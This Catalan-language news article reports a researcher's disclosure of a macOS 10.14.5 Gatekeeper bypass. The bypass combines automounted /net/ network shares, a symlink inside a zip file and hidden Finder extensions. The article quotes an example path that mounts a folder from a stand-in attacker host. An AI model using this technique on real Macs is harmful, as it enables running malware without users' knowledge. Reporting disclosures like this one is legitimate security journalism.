Tanca l'anunci

L'investigador de seguretat Filippo Cavallarin va publicar un avís sobre l'error a macOS 10.14.5 al seu bloc. Això consisteix en la possibilitat de saltar completament les mesures de seguretat de Gatekeeper. Segons Cavallarin, va assenyalar l'error a Apple ja al febrer d'aquest any, però la companyia no el va solucionar en l'última actualització.

Gatekeeper va ser desenvolupat per Apple i incorporat al seu sistema operatiu d'escriptori per primera vegada l'any 2012. És un mecanisme que impedeix que una aplicació s'executi sense el coneixement i consentiment de l'usuari. Després de descarregar una aplicació, Gatekeeper comprova automàticament el seu codi per veure si el programari està signat correctament per Apple.

A la seva publicació al bloc, Cavallarin afirma que Gatekeeper, per defecte, considera que tant l'emmagatzematge extern com les comparticions de xarxa són ubicacions segures. Per tant, qualsevol aplicació que resideixi en aquests objectius es pot iniciar automàticament sense haver de passar per la comprovació de Gatekeeper. Aquesta característica es pot aprofitar per llançar programari maliciós sense el coneixement de l'usuari.

Un aspecte que permet l'accés no autoritzat és la funció de muntatge automàtic, que permet als usuaris muntar automàticament una compartició de xarxa simplement especificant un camí que comenci per "/net/". Com a exemple, Cavallarin cita el camí "ls /net/evil-attacker.com/sharedfolder/" que pot provocar que el sistema operatiu carregui el contingut d'una carpeta "sharefolder" en una ubicació remota que pot ser potencialment maliciós.

Podeu veure com funciona l'amenaça al vídeo:

Un altre factor és el fet que si es comparteix un arxiu zip que conté un enllaç simbòlic específic que condueix a la funció de muntatge automàtic, Gatekeeper no el comprovarà. D'aquesta manera, la víctima pot descarregar fàcilment l'arxiu maliciós i descomprimir-lo, permetent a l'atacant executar pràcticament qualsevol programari al Mac sense el coneixement de l'usuari. El Finder, que amaga determinades extensions per defecte, també té la seva part d'aquesta vulnerabilitat.

Cavallarin afirma al seu bloc que Apple va cridar l'atenció sobre la vulnerabilitat del sistema operatiu macOS el 22 de febrer d'aquest any. Però a mitjans de maig, Apple va deixar de comunicar-se amb Cavallarin, així que Cavallarin va decidir fer-ho tot públic.

mac-finder-kit

Font: FCVL

.